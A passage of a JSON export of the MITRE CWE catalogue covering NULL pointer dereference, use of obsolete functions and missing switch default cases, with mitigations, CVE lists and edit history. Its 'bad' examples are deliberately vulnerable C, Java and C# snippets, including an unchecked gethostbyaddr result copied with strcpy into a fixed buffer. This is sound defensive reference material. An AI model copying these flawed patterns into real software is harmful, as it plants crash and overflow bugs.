Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit.","Extended_Description":"NULL pointer dereference issues can occur through a number of flaws, including race conditions, and simple programming omissions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"NULL pointer dereferences are frequently resultant from rarely encountered error conditions, since these are most likely to escape detection during the testing phases."}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"NULL pointer dereferences usually result in the failure of the process unless exception handling (on some platforms) is available and implemented. Even when exception handling is being used, it can still be very difficult to return the software to a safe state of operation."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"If all pointers that could have been modified are sanity-checked previous to use, nearly all NULL pointer dereferences can be prevented."},{"Phase":"Requirements","Description":"The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is non-null before acting upon it.","Effectiveness":"Moderate","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment. This solution does not handle the use of improperly initialized variables (CWE-665)."},{"Phase":"Architecture and Design","Description":"Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values."},{"Phase":"Implementation","Description":"Explicitly initialize all your variables and other data stores, either during declaration or just before the first usage."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"While there are no complete fixes aside from conscientious programming, the following steps will go a long way to ensure that NULL pointer dereferences do not occur.","Example_Code":{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (pointer1 != NULL) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","",""],"xhtml:i":["/* make use of pointer1 */","/* ... */"]}}}},"Body_Text":"If you are working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the if statement; and unlock when it has finished."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]},{"Intro_Text":"In the following code, the programmer assumes that the system always has a property named \\"cmd\\" defined. If an attacker can control the program\'s environment so that \\"cmd\\" is not defined, the program throws a NULL pointer exception when it attempts to call the trim() method.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String cmd = System.getProperty(\\"cmd\\");cmd = cmd.trim();","xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-3274","Description":"race condition causes a table to be corrupted if a timer activates while it is being modified, leading to resultant NULL dereference; also involves locking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3274"},{"Reference":"CVE-2002-1912","Description":"large number of packets leads to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1912"},{"Reference":"CVE-2005-0772","Description":"packet with invalid error status value triggers NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0772"},{"Reference":"CVE-2009-4895","Description":"Chain: race condition for an argument value, possibly resulting in NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4895"},{"Reference":"CVE-2009-2692","Description":"Chain: Use of an unimplemented network socket operation pointing to an uninitialized handler function (CWE-456) causes a crash because of a null pointer dereference (CWE-476).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-3547","Description":"Chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"},{"Reference":"CVE-2009-3620","Description":"Chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620"},{"Reference":"CVE-2009-2698","Description":"Chain: IP and UDP layers each track the same value with different mechanisms that can get out of sync, possibly resulting in a NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2698"},{"Reference":"CVE-2009-2692","Description":"Chain: uninitialized function pointers can be dereferenced allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-0949","Description":"Chain: improper initialization of memory can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949"},{"Reference":"CVE-2008-3597","Description":"Chain: game server can access player data structures before initialization has happened leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597"},{"Reference":"CVE-2020-6078","Description":"Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078"},{"Reference":"CVE-2008-0062","Description":"Chain: a message having an unknown message type may cause a reference to uninitialized memory resulting in a null pointer dereference (CWE-476) or dangling pointer (CWE-825), possibly crashing the system or causing heap corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2008-5183","Description":"Chain: unchecked return value can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183"},{"Reference":"CVE-2004-0079","Description":"SSL software allows remote attackers to cause a denial of service (crash) via a crafted SSL/TLS handshake that triggers a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0079"},{"Reference":"CVE-2004-0365","Description":"Network monitor allows remote attackers to cause a denial of service (crash) via a malformed RADIUS packet that triggers a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0365"},{"Reference":"CVE-2003-1013","Description":"Network monitor allows remote attackers to cause a denial of service (crash) via a malformed Q.931, which triggers a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1013"},{"Reference":"CVE-2003-1000","Description":"Chat client allows remote attackers to cause a denial of service (crash) via a passive DCC request with an invalid ID number, which causes a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1000"},{"Reference":"CVE-2004-0389","Description":"Server allows remote attackers to cause a denial of service (crash) via malformed requests that trigger a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0389"},{"Reference":"CVE-2004-0119","Description":"OS allows remote attackers to cause a denial of service (crash from null dereference) or execute arbitrary code via a crafted request during authentication protocol selection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0119"},{"Reference":"CVE-2004-0458","Description":"Game allows remote attackers to cause a denial of service (server crash) via a missing argument, which triggers a null pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0458"},{"Reference":"CVE-2002-0401","Description":"Network monitor allows remote attackers to cause a denial of service (crash) or execute arbitrary code via malformed packets that cause a NULL pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0401"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Null Dereference"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Null-pointer dereference"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Null Dereference (Null Pointer Dereference)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP34-C","Entry_Name":"Do not dereference null pointers","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP7","Entry_Name":"Faulty Pointer Use"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-1031"}},{"attr":{"@_External_Reference_ID":"REF-1032"}},{"attr":{"@_External_Reference_ID":"REF-1033"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Other_Notes, Potential_Mitigations, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"477":{"attr":{"@_ID":"477","@_Name":"Use of Obsolete Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained.","Extended_Description":{"xhtml:p":["As programming languages evolve, functions occasionally become obsolete due to:","Functions that are removed are usually replaced by newer counterparts that perform the same task in some different and hopefully improved way."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Advances in the language","Improved understanding of how operations should be performed effectively and securely","Changes in the conventions that govern certain operations"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode Quality Analysis"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Debugger"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source Code Quality Analyzer","Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Origin Analysis"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Formal Methods / Correct-By-Construction","Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Refer to the documentation for the obsolete function in order to determine why it is deprecated or obsolete and to learn about alternative ways to achieve the same functionality."},{"Phase":"Requirements","Description":"Consider seriously the security implications of using an obsolete function. Consider using alternate functions."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses the deprecated function getpw() to verify that a plaintext password matches a user\'s encrypted password. If the password is valid, the function sets result to 1; otherwise it is set to 0.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...getpw(uid, pwdline);for (i=0; i&lt;3; i++){}result = strcmp(crypt(plainpw,cryptpw), cryptpw) == 0;...","xhtml:br":["","","",""],"xhtml:div":{"#text":"cryptpw=strtok(pwdline, \\":\\");pwdline=0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Although the code often behaves correctly, using the getpw() function can be problematic from a security standpoint, because it can overflow the buffer passed to its second parameter. Because of this vulnerability, getpw() has been supplanted by getpwuid(), which performs the same lookup as getpw() but returns a pointer to a statically-allocated structure to mitigate the risk. Not all functions are deprecated or replaced because they pose a security risk. However, the presence of an obsolete function often indicates that the surrounding code has been neglected and may be in a state of disrepair. Software security has not been a priority, or even a consideration, for very long. If the program uses deprecated or obsolete functions, it raises the probability that there are security problems lurking nearby."},{"Intro_Text":"In the following code, the programmer assumes that the system always has a property named \\"cmd\\" defined. If an attacker can control the program\'s environment so that \\"cmd\\" is not defined, the program throws a null pointer exception when it attempts to call the \\"Trim()\\" method.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String cmd = null;...cmd = Environment.GetEnvironmentVariable(\\"cmd\\");cmd = cmd.Trim();","xhtml:br":["","",""]}}},{"Intro_Text":"The following code constructs a string object from an array of bytes and a value that specifies the top 8 bits of each 16-bit Unicode character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String name = new String(nameBytes, highByte);...","xhtml:br":["",""]}},"Body_Text":"In this example, the constructor may not correctly convert bytes to characters depending upon which charset is used to encode the string represented by nameBytes. Due to the evolution of the charsets used to encode strings, this constructor was deprecated and replaced by a constructor that accepts as one of its parameters the name of the charset used to encode the bytes for conversion."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Obsolete"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL30-PL","Entry_Name":"Do not import deprecated modules","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP30-PL","Entry_Name":"Do not use deprecated or obsolete functions or modules","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Obsolete","attr":{"@_Date":"2008-01-30"}},{"#text":"Use of Obsolete Functions","attr":{"@_Date":"2017-11-08"}}]}},"478":{"attr":{"@_ID":"478","@_Name":"Missing Default Case in Switch Statement","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not have a default case in a switch statement, which might lead to complex logical errors and resultant weaknesses.","Extended_Description":"This flaw represents a common problem in software development, in which not all possible values for a variable are considered or handled by a given process. Because of this, further decisions are made based on poor information, and cascading failure results. This cascading failure may result in any number of security issues, and constitutes a significant failure in the system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Varies by Context","Alter Execution Logic"],"Note":"Depending on the logical circumstances involved, any consequences may result: e.g., issues of confidentiality, authentication, authorization, availability, integrity, accountability, or non-repudiation."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure that there are no unaccounted for cases, when adjusting flow or values based on the value of a given variable. In switch statements, this can be accomplished through the use of the default label."},{"Phase":"Implementation","Description":"In the case of switch style statements, the very simple act of creating a default case can mitigate this situation, if done correctly. Often however, the default case is used simply to represent an assumed option, as opposed to working as a check for invalid input. This is poor practice and in some cases is as bad as omitting a default case entirely."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following does not properly check the return code in the case where the security_check function returns a -1 value when an error occurs. If an attacker can supply data that will invoke an error, the attacker can bypass the security check:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define FAILED 0#define PASSED 1int result;...result = security_check(data);switch (result) {}...","xhtml:br":["","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case FAILED:case PASSED:","xhtml:div":[{"#text":"printf(\\"Security check failed!\\\\n\\");exit(-1);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//Break never reached because of exit()"},{"#text":"printf(\\"Security check passed.\\\\n\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}},"xhtml:i":"// program execution continues..."}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"#define FAILED 0#define PASSED 1int result;...result = security_check(data);switch (result) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case FAILED:case PASSED:default:","xhtml:div":[{"#text":"printf(\\"Security check failed!\\\\n\\");exit(-1);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//Break never reached because of exit()"},{"#text":"printf(\\"Security check passed.\\\\n\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"printf(\\"Unknown error (%d), 